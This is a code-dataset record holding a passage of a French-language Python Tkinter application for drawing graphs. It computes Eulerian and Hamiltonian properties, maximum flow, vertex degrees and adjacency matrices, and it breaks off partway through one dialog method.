hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
e7ce0818904d46d11eb74c9bc1c1d5e0067a9008
68,039
py
Python
GraphTrace.py
a-dera/Graphe
70886565cc1dbda9f343dc11edcc480e2372934f
[ "MIT" ]
null
null
null
GraphTrace.py
a-dera/Graphe
70886565cc1dbda9f343dc11edcc480e2372934f
[ "MIT" ]
null
null
null
GraphTrace.py
a-dera/Graphe
70886565cc1dbda9f343dc11edcc480e2372934f
[ "MIT" ]
null
null
null
##################################################
# Library imports and helper functions:
from tkinter import *
from tkinter import PhotoImage
from tkinter import ttk
import tkinter as tk
from collections import defaultdict

# Robustness fix: Pillow is a third-party dependency used only by the GUI's
# save() screenshot feature.  Tolerate its absence so the pure graph
# algorithms below stay importable/usable without Pillow installed.
try:
    from PIL import ImageGrab
except ImportError:
    ImageGrab = None  # save() will raise explicitly if ever used without Pillow


class Euler:
    """Eulerian-property test for an undirected graph.

    Vertices are labelled 0 .. V-1 and edges are kept in adjacency lists.
    isEulerian() classifies the graph as:
        0 -> not Eulerian
        1 -> has an Euler path (semi-Eulerian)
        2 -> has an Euler circuit (Eulerian)
    """

    def __init__(self, vertices):
        # Number of vertices.
        self.V = vertices
        # Adjacency lists; defaultdict avoids key checks in addEdge/DFS.
        self.graph = defaultdict(list)

    def addEdge(self, u, v):
        """Add an undirected edge u—v (stored in both adjacency lists)."""
        self.graph[u].append(v)
        self.graph[v].append(u)

    def DFSUtil(self, v, visited):
        """Depth-first traversal: mark every vertex reachable from v."""
        visited[v] = True
        for neighbour in self.graph[v]:
            if not visited[neighbour]:
                self.DFSUtil(neighbour, visited)

    def isConnected(self):
        """Return True when all vertices of non-zero degree lie in one component.

        BUG FIX: the original scanned for a start vertex with
        ``len(self.graph[i]) > 1`` (skipping degree-1 vertices) and returned
        True without running DFS whenever the loop ran to its last index.
        The correct criterion is simply degree > 0.  Also handles V == 0,
        which previously raised NameError.
        """
        visited = [False] * self.V
        # Find any vertex with non-zero degree to start the DFS from.
        start = -1
        for i in range(self.V):
            if len(self.graph[i]) > 0:
                start = i
                break
        # No edges at all: trivially connected for Euler purposes.
        if start == -1:
            return True
        self.DFSUtil(start, visited)
        # A second component containing edges makes the graph non-Eulerian.
        for i in range(self.V):
            if not visited[i] and len(self.graph[i]) > 0:
                return False
        return True

    def isEulerian(self):
        """Classify the graph: 0 = not Eulerian, 1 = Euler path, 2 = Euler circuit."""
        if not self.isConnected():
            return 0
        # Count vertices of odd degree.  In an undirected graph this count
        # is always even: 0 -> circuit, 2 -> path, more -> not Eulerian.
        odd = sum(1 for i in range(self.V) if len(self.graph[i]) % 2 != 0)
        if odd == 0:
            return 2
        elif odd == 2:
            return 1
        else:
            return 0

    def test(self):
        """Return a French description of the Eulerian classification."""
        res = self.isEulerian()
        if res == 0:
            return "Le graphe n'est pas eulerien"
        elif res == 1:
            return "Le graphe comporte un chemain eulerien"
        else:
            return "Le graphe comporte un cycle eulerien"
class Hamilton():
    """Backtracking search for a Hamiltonian cycle on an adjacency matrix.

    The caller may assign a V x V 0/1 matrix to ``self.graph`` after
    construction; hamCycle() returns a French result string.
    """

    def __init__(self, vertices):
        # Square adjacency matrix, all zeroes until the caller fills it in.
        self.V = vertices
        self.graph = [[0] * vertices for _ in range(vertices)]

    def isSafe(self, v, pos, path):
        """Candidate check: v must be adjacent to path[pos-1] and unused so far."""
        return self.graph[path[pos - 1]][v] != 0 and v not in path

    def hamCycleUtil(self, path, pos):
        """Recursive backtracking step: try to place a vertex at path[pos]."""
        if pos == self.V:
            # Every vertex is placed; a cycle also needs an edge back to the start.
            return self.graph[path[pos - 1]][path[0]] == 1
        # Vertex 0 is fixed as the starting point by hamCycle(), so candidates
        # run from 1 upward.
        for candidate in range(1, self.V):
            if self.isSafe(candidate, pos, path):
                path[pos] = candidate
                if self.hamCycleUtil(path, pos + 1):
                    return True
                # Undo the placement: this candidate leads to no solution.
                path[pos] = -1
        return False

    def hamCycle(self):
        """Search for a Hamiltonian cycle and report the result in French.

        The graph is undirected, so any cycle can be rotated to start at
        vertex 0; fixing path[0] = 0 loses no generality.
        """
        path = [-1] * self.V
        path[0] = 0
        if not self.hamCycleUtil(path, 1):
            return "Le graphe n'est pas hamiltonien"
        return self.printSolution(path)

    def printSolution(self, path):
        """Format the found cycle, closing it by repeating the start vertex."""
        cycle = " ".join(str(v) for v in path)
        return "Le graphe est hamiltonien: " + cycle + " " + str(path[0])
##########################################
class Max_flow:
    """Maximum flow via Ford-Fulkerson with BFS augmenting paths (Edmonds-Karp).

    ``graph`` is a square capacity matrix; it is mutated in place as the
    residual graph while FordFulkerson() runs.
    """

    def __init__(self, graph):
        # Residual graph (capacity matrix), modified during the computation.
        self.graph = graph
        self.ROW = len(graph)

    def BFS(self, s, t, parent):
        """Return True if sink t is reachable from source s in the residual graph.

        Fills parent[] so the augmenting path can be walked back from t.
        """
        # Local import: the file's top-level only imports defaultdict from
        # collections; deque gives O(1) dequeues vs list.pop(0)'s O(n).
        from collections import deque

        visited = [False] * self.ROW
        queue = deque([s])
        visited[s] = True
        while queue:
            u = queue.popleft()
            # Enqueue every unvisited neighbour with remaining capacity.
            for ind, val in enumerate(self.graph[u]):
                if not visited[ind] and val > 0:
                    queue.append(ind)
                    visited[ind] = True
                    parent[ind] = u
        return visited[t]

    def FordFulkerson(self, source, sink):
        """Return the maximum flow from source to sink.

        Side effect: self.graph ends up holding residual capacities.
        """
        parent = [-1] * self.ROW
        max_flow = 0
        # Augment while BFS still finds a source->sink path.
        while self.BFS(source, sink, parent):
            # Bottleneck capacity along the path found by BFS.
            path_flow = float("Inf")
            s = sink
            while s != source:
                path_flow = min(path_flow, self.graph[parent[s]][s])
                s = parent[s]
            max_flow += path_flow
            # Update residual capacities of the path edges and reverse edges.
            v = sink
            while v != source:
                u = parent[v]
                self.graph[u][v] -= path_flow
                self.graph[v][u] += path_flow
                v = parent[v]
        return max_flow
filemenu.add_command(label = "Successeur du sommet", command=self.successeur) filemenu.add_command(label = "Predecesseur du sommet", command=self.predeccesseur) filemenu.add_command(label = "Demi degre supperieur du sommet", command=self.demi_deg_sup) filemenu.add_command(label = "Demi degre inferieur du sommet", command=self.demi_deg_inf) filemenu.add_command(label = "Graphe Hamiltonien ?", command=self.hamilton) filemenu.add_command(label = "Graphe Eulerien ?", command=self.euler) filemenu.add_command(label = "Flow maximal", command=self.maxflow) menubar.add_cascade(label = "Traitement", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Tout effacer ?", command =self.delete) menubar.add_cascade(label = "Effacer", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Aide", command =self.aide) menubar.add_cascade(label = "Aide", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) self.config(menu = menubar) #variable globale self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() def delete(self): for element in self.graphe.find_all(): self.graphe.delete(element) self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() pass # fonction permettant de fermer la fenetre fille def Close_Toplevel (self): self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() #fenetre permettant de fermet la fenetre fille de sauvegarde def Close_Save (self,event=None): if len(self.var.get())>0: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() 
image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/{}.png".format(self.var.get())) else: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/Graphe.png") self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() def aide(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,150) self.toplevel_dialog.wm_title("Aide") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=150 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focus() aide=""" Tracer un sommet: Double clic Tracer un arc: clic gauche sur chaque sommet """ self.label=tk.Label(self.toplevel_dialog, text=aide,justify='left',font='Century 13 bold') self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction de sauvegarde du graphe dessiner def save(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Sauvegarder") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Save) 
self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ') self.label.pack(side='left') self.var=tk.Entry(self.toplevel_dialog) self.var.pack(side='left') self.var.bind("<Return>", self.Close_Save) self.var.bind("<Escape>", self.Close_Toplevel) self.var.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_Save) self.yes_button.pack(side='right',fill='x',expand=True) # fonction permettant de detecter si le graphe est eulerien def euler(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Graphe eulerien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) l=len(self.couple) lg=len(self.sommets) if lg>=2: g1 = Euler(lg) for i in range(l): g1.addEdge(self.couple[i][0],self.couple[i][1]) self.var=g1.test() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de detecter si le graphe est hamiltonien def hamilton(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) 
self.toplevel_dialog.wm_title("Graphe hamiltonien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) lg=len(self.couple) if lg>1: l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) k+=1 if k==0: self.matrice[i].append(0) g1 = Hamilton(l) g1.graph = self.matrice self.var=g1.hamCycle() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de connetre le flow maximal def maxflow(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,200) self.toplevel_dialog.wm_title("Flow maximal") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=200 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet source: ') self.label.grid(row=1) 
self.valeur1=tk.Entry(self.toplevel_dialog) self.valeur1.grid(row=1,column=1) self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ') self.label.grid(row=2) self.valeur2=tk.Entry(self.toplevel_dialog) self.valeur2.grid(row=2,column=1) self.label=tk.Label(self.toplevel_dialog, text='\n\n') self.label.grid(row=3) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_maxflow) self.yes_button.grid(row=4,column=1) self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=4,column=3) pass def Close_maxflow (self): lg=len(self.couple) if self.valeur1.get() in str(self.sommets) and self.valeur2.get() in str(self.sommets) and lg>0 and self.valeur1.get()!=self.valeur2.get() : l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(element[2]) k+=1 if k==0: self.matrice[i].append(0) g = Max_flow(self.matrice) src=int(self.valeur1.get()) des=int(self.valeur2.get()) self.label=tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(src, des)) self.label.grid(row=6) else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.grid(row=6) pass def matriceAdj(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(300,300) self.toplevel_dialog.wm_title("Matrice D'adjacence") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=300 hauteure=300 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", 
self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) lg=len(self.couple) if lg>0: l=len(self.sommets) self.matrice=list() for i in range(l): resultat="" self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) resultat+="1 " k+=1 if k==0: self.matrice[i].append(0) resultat+="0 " self.label=tk.Label(self.toplevel_dialog, text=resultat) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de donner le successeur d'un sommet def successeur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Successeur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.focus() self.toplevel_dialog.bind("<Return>", self.Close_suc) self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_suc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) 
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_suc) self.yes_button.grid(row=1,column=4) pass def Close_suc(self): if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[0]): resultat+=str(element[1])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(),resultat)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def predeccesseur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Predecesseur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_pred) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_pred) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_pred) self.yes_button.grid(row=1,column=4) def Close_pred(self): if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[1]): 
resultat+=str(element[0])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(),resultat)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def demi_deg_sup(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(700,100) self.toplevel_dialog.wm_title("Demi degre supperieur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=700 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre_sup) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre_sup) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_sup) self.yes_button.grid(row=1,column=4) def Close_degre_sup(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() == str(element[0]): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre supperieur du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') 
self.toplevel_dialog_label.grid(row=2) def demi_deg_inf(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(700,100) self.toplevel_dialog.wm_title("Demi degre inferieur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=700 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre_inf) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre_inf) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_inf) self.yes_button.grid(row=1,column=4) def Close_degre_inf(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() == str(element[1]): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre inferieur du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def degres_sommet(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Degre du sommet") width=self.toplevel_dialog.winfo_screenwidth() 
height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=5) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre) self.yes_button.grid(row=1,column=3) def Close_degre(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() in str(element): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le degre du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def ordre_graphe(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(502,50) self.toplevel_dialog.wm_title("Ordre du graphe") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=50 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", 
